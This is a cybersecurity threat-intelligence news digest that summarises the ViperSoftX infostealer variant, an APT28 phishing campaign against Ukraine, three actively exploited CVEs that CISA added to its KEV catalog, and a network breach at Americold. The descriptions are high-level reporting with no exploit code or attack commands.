Malware Activity
New "ViperSoftX" Variant Evolved to Target Password Managers, Cryptocurrency Wallets, and Browsers
Researchers have identified a new variant of the "ViperSoftX" cryptocurrency and information-stealing malware currently targeting password managers, including KeePass and 1Password. In the latest campaign, ViperSoftX targets a new range of browsers, including Brave, Opera, Edge, and Firefox, and impacts both the consumer and enterprise sectors. As of April 24, 2023, over 50% of the campaign's activity has taken place in the United States, Australia, Japan, India, Taiwan, Malaysia, Italy, and France. The malware has evolved to have a stronger encryption measure of byte remapping, which increases analysis difficulty as analysts cannot correctly decrypt the encrypted shellcode without having the correct byte map. The malware is also changing its command-and-control (C2) server monthly in order to make detection evasion easier. Researchers explained that ViperSoftX arrives as "a software crack, an activator or a patcher, or a key generator (keygen)" and is often carried through the files of legitimate, non-malicious software in order to remain hidden while posing as illegal software versions. Once the victim machine has the carrier software, the malware checks for virtual machines, monitoring tools, and antivirus products. If the machine passes these checks, the malware then decrypts the Powershell code and downloads the malware's main routine. Researchers noted that ViperSoftX is known as a cryptocurrency stealer and, in the new variant, still reviews for a wide range of cryptocurrency wallets in local directories as well as browser extensions. CTIX analysts will continue to monitor the evolution and activity of ViperSoftX and will provide new details as they become available. Indicators of compromise (IOCs) as well as additional technical details can be viewed in the report linked below.
Threat Actor Activity
APT28 Targets Ukrainian Governments
A group of state-sponsored Russian hackers are back in the news this week after launching their new campaign against Ukraine and its allies. The group is tracked as APT28 (Fancy Bear, Pawn Storm) and is known for their espionage campaigns against NATO countries. Campaigns attributed to the group include the French TV5Monde defacement of 2015, Democratic National Committee (DNC) compromise of 2016, and German government compromises between 2015 and 2017. Several group members were arrested in 2018 after their participation in the DNC attack, including nine (9) GRU officials. In this new campaign, APT28 actors distributed malicious phishing correspondence to the Ukrainian government. Masking themselves as system administrators, APT28 actors lured victims into interacting with their so-called "Windows Update" application. Upon executing this application at the command line, a PowerShell script is downloaded which begins to simulate a simple Windows system update. However, once this script begins a second-stage payload it runs additional commands in the background to gather information about the infected system. Threat actors utilized the ".\tasklist.exe" and ".\systeminfo.exe" PowerShell commands and transmitted that data back to actor-controlled command-and-control (C2) servers. CTIX continues to track threat actor activity worldwide and will provide additional updates accordingly.
Vulnerabilities
CISA Adds Three Vulnerabilities to its KEV Catalog Impacting TP-Link, Apache, and Oracle Products
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three (3) critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerabilities affect TP-Link, Apache, and Oracle products, and are all under active exploitation by threat actors according to CISA. The first flaw, tracked as CVE-2023-1389, is a command injection vulnerability in the TP-Link Archer AX-21 router that could be exploited to conduct remote code execution (RCE). Researchers have observed threat actors associated with the Mirai botnet exploiting CVE-2023-1389 since early April 2023. The second vulnerability, tracked as CVE-2021-45046, is a deserialization of untrusted data flaw in the Apache Log4j2 logging library which is also being exploited to conduct RCE. Although specific threat actors have not been attributed to exploiting this weakness, researchers have observed exploitation attempts from at least seventy-four (74) unique IP addresses that have also been observed exploiting the notorious Log4Shell vulnerability (CVE-2021-44228). The third flaw, tracked as CVE-2023-21839, is an unspecified server vulnerability in Oracle WebLogic Servers that allows unauthenticated threat actors who have already gained access to the target network to access sensitive data for exfiltration. The presence of these vulnerabilities on CISA's KEV mandates that all Federal Civilian Executive Branch (FCEB) agencies patch these vulnerabilities or apply vendor-approved mitigation techniques by no later than May 22, 2023, or face being held accountable by regulators. CTIX analysts urge any users or organizations leveraging the aforementioned devices/software to update and harden their systems as soon as possible.
Honorable Mention
Leading Cold Storage Company Shuts Down Network After Reporting Breach
Americold, a leading cold storage and logistics company based in Atlanta, filed an incident report with the Securities and Exchange Commission (SEC) regarding a cybersecurity incident that occurred on April 25, 2023, relating to their computer network being breached. Americold controls 250 warehouses across the world, a large majority of which are used by food producers, distributors, and retailers. The company is the largest publicly traded real estate investment trust focused on the ownership, operation, acquisitions, and development of temperature-controlled warehouses. In response to the attack, Americold was able to contain the intrusion and shut down their network to secure their system as well as avoid further disruption to non-contained areas. One (1) customer alleged that the company's "phones [were] down and they had the truck entrance barricaded off with the main entrance gates shut." The company sent out a memo requesting that all inbound deliveries be rescheduled until further notice and that only the most critical outbound deliveries be continued, such as those having the potential to reach an expiration date. While the company has not released a statement about the incident nor confirmed this to be a ransomware attack, Americold noted that they are assessing what data can be recovered while they focus on rebuilding impacted systems. It should be noted that there has been an observed increase in cyberattacks on food and beverage supply chain companies within the past few years, with fifty-two (52) reported ransomware attacks in 2022. This incident is the second cyberattack Americold has faced, as their last event occurred in late 2020. Dragos CEO Rob Lee stated that the "hyperconnectivity and scalability of automation is what is allowing ransomware authors to do what they are doing," and that threat actors are targeting companies that cannot function when their digital systems go offline, taking advantage of companies' digital transformation projects.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.